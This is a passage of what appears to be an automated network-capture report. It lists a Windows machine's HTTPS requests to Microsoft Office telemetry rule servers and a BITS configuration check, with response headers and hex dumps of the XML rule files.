                                                                                                                                                                        x-azure-ref: 20241121T093759Z-178bfbc474brk967hC1NYCfu60000000013g000000005aaf
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:59 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        107192.168.2.64982813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:59 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:59 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                        x-ms-request-id: b9d90d28-901e-00a0-5d63-3b6a6d000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093759Z-178bfbc474b9fdhphC1NYCac0n0000000180000000004pbr
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:00 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        108192.168.2.64983013.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:00 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:00 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                        x-ms-request-id: 07391e4c-a01e-0032-018c-3a1949000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093800Z-1777c6cb754lvj6mhC1TEBke940000000aw000000000fv1z
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:00 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        109192.168.2.64983113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:00 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:00 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1389
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                        x-ms-request-id: 46934538-601e-0050-507b-3b2c9c000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093800Z-178bfbc474bq2pr7hC1NYCkfgg00000001cg000000009cfu
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:00 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        110192.168.2.64983313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:01 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:01 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:01 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1352
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                        x-ms-request-id: c363d474-d01e-0028-1b8c-3a7896000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093801Z-1777c6cb754dqb2khC1TEBmk1s0000000axg000000005meb
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:01 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        111192.168.2.64983413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:01 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:01 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                        x-ms-request-id: 4583eb13-901e-0064-56c3-3be8a6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093801Z-r1d97b99577n4dznhC1TEBc1qw0000000a8g000000003qyg
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:01 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        112192.168.2.64983613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:01 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:02 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                                                                                                        x-ms-request-id: df1e4bb0-c01e-0034-6f8a-3a2af6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093802Z-r1d97b99577d6qrbhC1TEBux5s0000000a9g000000007mnz
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:02 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        113192.168.2.64983713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:02 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:02 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                        ETag: "0x8DC582BE055B528"
                                                                                                                                                                        x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093802Z-178bfbc474bwlrhlhC1NYCy3kg000000015000000000g200
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:03 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        114192.168.2.64984013.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:02 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:03 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:03 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                        ETag: "0x8DC582BE1223606"
                                                                                                                                                                        x-ms-request-id: 45806a8e-701e-003e-807c-3b79b3000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093803Z-1777c6cb7549j9hhhC1TEBzmcc0000000arg00000000gn26
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:03 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        115192.168.2.649843184.28.90.27443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:03 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                        2024-11-21 09:38:03 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                        Server: ECAcc (lpl/EF70)
                                                                                                                                                                        X-CID: 11
                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                        X-Ms-Region: prod-neu-z1
                                                                                                                                                                        Cache-Control: public, max-age=198448
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:03 GMT
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-CID: 2


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        116192.168.2.64984213.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:03 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:03 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                        ETag: "0x8DC582BE7262739"
                                                                                                                                                                        x-ms-request-id: 5a5a1185-c01e-0079-408c-3ae51a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093803Z-r1d97b995778dpcthC1TEB4b540000000a4g000000002xp6
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
